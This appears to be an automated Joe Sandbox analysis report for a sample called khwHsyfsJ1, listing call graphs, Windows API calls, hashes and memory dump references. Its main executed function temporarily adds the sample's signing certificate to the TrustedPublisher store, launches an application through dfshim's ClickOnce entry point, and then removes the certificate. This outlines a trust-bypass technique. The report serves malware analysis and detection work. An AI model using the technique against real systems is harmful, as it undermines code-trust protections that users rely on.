6737->6738 6739 b63806 6737->6739 6738->6723 6739->6738 6740 b647f9 _free 15 API calls 6739->6740 6741 b63819 6740->6741 6742 b6473d _abort 21 API calls 6741->6742 6743 b63824 6742->6743 6743->6723 6745 b61674 6744->6745 6746 b61670 6744->6746 6747 b6191f 4 API calls 6745->6747 6749 b61681 ___scrt_release_startup_lock 6745->6749 6746->6727 6748 b616ea 6747->6748 6749->6727 6767 b617c4 6750->6767 6753->6731 6805 b63e2a 6754->6805 6756 b618cb 6757 b618d2 6756->6757 6758 b6191f 4 API calls 6756->6758 6757->6733 6759 b618da 6758->6759 6759->6733 6761 b64424 _abort 33 API calls 6760->6761 6762 b6389c 6761->6762 6763 b647f9 _free 15 API calls 6762->6763 6766 b638d4 6762->6766 6764 b638c9 6763->6764 6765 b6473d _abort 21 API calls 6764->6765 6765->6766 6766->6735 6768 b617d3 6767->6768 6769 b617da 6767->6769 6773 b63c81 6768->6773 6776 b63cf1 6769->6776 6772 b617d8 6772->6729 6774 b63cf1 24 API calls 6773->6774 6775 b63c93 6774->6775 6775->6772 6779 b639f8 6776->6779 6782 b6392e 6779->6782 6781 b63a1c 6781->6772 6783 b6393a ___scrt_is_nonwritable_in_current_image 6782->6783 6790 b656e2 EnterCriticalSection 6783->6790 6785 b63948 6791 b63b40 6785->6791 6787 b63955 6801 b63973 6787->6801 6789 b63966 _abort 6789->6781 6790->6785 6792 b63b5e 6791->6792 6799 b63b56 _abort 6791->6799 6793 b63bb7 6792->6793 6794 b6681b 24 API calls 6792->6794 6792->6799 6795 b6681b 24 API calls 6793->6795 6793->6799 6796 b63bad 6794->6796 6797 b63bcd 6795->6797 6798 b64869 _free 15 API calls 6796->6798 6800 b64869 _free 15 API calls 6797->6800 6798->6793 6799->6787 6800->6799 6804 b6572a LeaveCriticalSection 6801->6804 6803 b6397d 6803->6789 6804->6803 6807 b63e48 6805->6807 6809 b63e68 6805->6809 6806 b647f9 _free 15 API calls 6808 b63e5e 6806->6808 6807->6806 6810 b6473d _abort 21 API calls 6808->6810 6809->6756 6810->6809 5939 b61489 5942 b61853 5939->5942 5941 b6148e 5941->5941 5943 b61869 5942->5943 5945 b61872 5943->5945 5946 b61806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5943->5946 5945->5941 5946->5945

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00B61000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199encryptionmemorylibraryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000104), ref: 00B61016
                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00B61025
                                                                                                                                                                                                                                                          • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00B61032
                                                                                                                                                                                                                                                          • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00B61057
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00040000), ref: 00B61063
                                                                                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00B61082
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00B610B2
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,?), ref: 00B610C5
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00002000), ref: 00B610F4
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00B6110A
                                                                                                                                                                                                                                                          • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00B6111A
                                                                                                                                                                                                                                                          • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00B6112D
                                                                                                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 00B61134
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00B6113E
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00B6115D
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00B6116E
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00B61182
                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00B61198
                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00B611A9
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(dfshim), ref: 00B611BA
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00B611C6
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00009C40), ref: 00B611E8
                                                                                                                                                                                                                                                          • CertDeleteCertificateFromStore.CRYPT32(?), ref: 00B6120B
                                                                                                                                                                                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 00B6121A
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00B61223
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00B61228
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00B6122D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                          • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                          • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                          • Opcode ID: f6bc77153e72251b51d4ac7aa5685f6a8e1e19e81c5e7771ca1c9a31e021b77a
                                                                                                                                                                                                                                                          • Instruction ID: 44d14f69490bb87ae8da8fcfae34cd309c3a3e39416d87660921077008257444
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bc77153e72251b51d4ac7aa5685f6a8e1e19e81c5e7771ca1c9a31e021b77a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D615E71A40219BBEB119F94DC45FAFBBB5FF48B50F140054E614F72E0CBB999418BA4

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 00B6191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00B6192B
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00B619F7
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B61A10
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00B61A1A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: cd0626ba2e608b4f18ec5053b7266efc5c5c84b858c617a4b7b07497f82da66b
                                                                                                                                                                                                                                                          • Instruction ID: 81059be4c3f368fca1457f72ba52375506ba3643837a50d5e0c6b9d25dca9153
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd0626ba2e608b4f18ec5053b7266efc5c5c84b858c617a4b7b07497f82da66b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B431F875D052189BDF21DFA4D949BCDBBF8AF08301F1041EAE50CAB290EB759A85CF45
                                                                                                                                                                                                                                                          Function 00B64573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B6466B
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B64675
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B64682
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: dbe28cc2ed3bfe08d488f251ffced8f0be0e831dc82f74d393b172249552e2da
                                                                                                                                                                                                                                                          • Instruction ID: 97600c7b845d3d4703d43ab178db299072e1ef8f4864126aa253018c42181635
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbe28cc2ed3bfe08d488f251ffced8f0be0e831dc82f74d393b172249552e2da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731B3759012189BCB21DF68D989B8DBBF8FF08311F5045EAE41CA7250EB749B858F45
                                                                                                                                                                                                                                                          Function 00B63677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002,00000000,?,00B63F66,00000003,00B6209F,00B61AFC), ref: 00B63698
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002,00000000,?,00B63F66,00000003,00B6209F,00B61AFC), ref: 00B6369F
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00B636B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                          • Opcode ID: d07978732b8b76904f442a7d59b0fe93fdc3008bb2a1a63add8bc6ca14d49b61
                                                                                                                                                                                                                                                          • Instruction ID: 4d1f59e45b60ef8a94c88c28ad88e89f7bcb2aa571d3796ddb1f45ea92e701a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d07978732b8b76904f442a7d59b0fe93fdc3008bb2a1a63add8bc6ca14d49b61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4E09232014548ABCF21AF54DE09E5A3FA9EB40745B044094FA599B271DF7DDA92CA50
                                                                                                                                                                                                                                                          Function 00B64A4B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                                          • Opcode ID: 63020c5e8923f93a28ecee6f519ebc76418c649d10e3591f16481e8d986b754d
                                                                                                                                                                                                                                                          • Instruction ID: b189a929fcd6fb727fb9d7e96aebbdeae2396f889093428acb69f4dc40a584ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63020c5e8923f93a28ecee6f519ebc76418c649d10e3591f16481e8d986b754d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1731E272900649ABCB249E78CC84EFB7BFDEB85314F0441E8F519D7251EB789D458B60
                                                                                                                                                                                                                                                          Function 00B6A495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B6A490,?,?,00000008,?,?,00B6A130,00000000), ref: 00B6A6C2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                          • Opcode ID: 84dfd480e41882cca01759384877d9a44da246cd7121a0746e22689261938e5f
                                                                                                                                                                                                                                                          • Instruction ID: c33372b330a6bc4aab53fd3a23fd11a06fc5d6439a55ff0dc43d6fad9aae8c1d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84dfd480e41882cca01759384877d9a44da246cd7121a0746e22689261938e5f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CB14E316106089FDB15CF28C49AB647BE0FF45364F298698E89ADF2A1C739ED91CF41
                                                                                                                                                                                                                                                          Function 00B61BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B61BEA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                          • Opcode ID: 0860753d12878ce345219f388a894b617f84b6432e14b3976dfcecf3f019a597
                                                                                                                                                                                                                                                          • Instruction ID: 7deafc83a65e2f2ff276fe15a9a44da555d14ddf6d329613deb5620b6156d240
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0860753d12878ce345219f388a894b617f84b6432e14b3976dfcecf3f019a597
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54515071E116058BDB15CF5DD885BAEB7F0FB48350F188869D409EB360E7789981CF60
                                                                                                                                                                                                                                                          Function 00B61AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00B61300), ref: 00B61AB1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          • Opcode ID: 062debbd20ed68fe89e2b051dcff995217db03530acbcbe2036795e93cfcbceb
                                                                                                                                                                                                                                                          • Instruction ID: 1b962e12281e5e9e442231fd67b7bf7e730b5e84dd55458e8d18bc3ee0f40804
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 062debbd20ed68fe89e2b051dcff995217db03530acbcbe2036795e93cfcbceb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                          Function 00B66893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                          • Opcode ID: 4fa964276ce6f5697f82497c25c51f78221f81b7256e937cba20bdda273ceb8e
                                                                                                                                                                                                                                                          • Instruction ID: ca6a012335c4d06110fcf08cfc27fb3051e30c2dd75a7b8503468301a1ff4bb4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fa964276ce6f5697f82497c25c51f78221f81b7256e937cba20bdda273ceb8e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12A012302001019B43008F309A4520835A86501590B0100149008E2460DF3440C05A01
                                                                                                                                                                                                                                                          Function 00B66507 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 81 b66507-b6651b 82 b6651d-b66522 81->82 83 b66589-b66591 81->83 82->83 84 b66524-b66529 82->84 85 b66593-b66596 83->85 86 b665d8-b665f0 call b6667a 83->86 84->83 87 b6652b-b6652e 84->87 85->86 89 b66598-b665d5 call b64869 * 4 85->89 95 b665f3-b665fa 86->95 87->83 90 b66530-b66538 87->90 89->86 93 b66552-b6655a 90->93 94 b6653a-b6653d 90->94 100 b66574-b66588 call b64869 * 2 93->100 101 b6655c-b6655f 93->101 94->93 97 b6653f-b66551 call b64869 call b66078 94->97 98 b665fc-b66600 95->98 99 b66619-b6661d 95->99 97->93 105 b66616 98->105 106 b66602-b66605 98->106 109 b66635-b66641 99->109 110 b6661f-b66624 99->110 100->83 101->100 107 b66561-b66573 call b64869 call b66176 101->107 105->99 106->105 114 b66607-b66615 call b64869 * 2 106->114 107->100 109->95 112 b66643-b66650 call b64869 109->112 117 b66626-b66629 110->117 118 b66632 110->118 114->105 117->118 119 b6662b-b66631 call b64869 117->119 118->109 119->118
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00B6654B
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66095
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660A7
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660B9
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660CB
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660DD
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660EF
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66101
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66113
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66125
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66137
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66149
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B6615B
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B6616D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66540
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66562
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66577
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66582
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665A4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665B7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665C5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665D0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66608
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6660F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6662C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66644
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: c7c20aff9c3f31a2a5acd5f19455da59379b0c4cfa96a976b91d7f07df4435a5
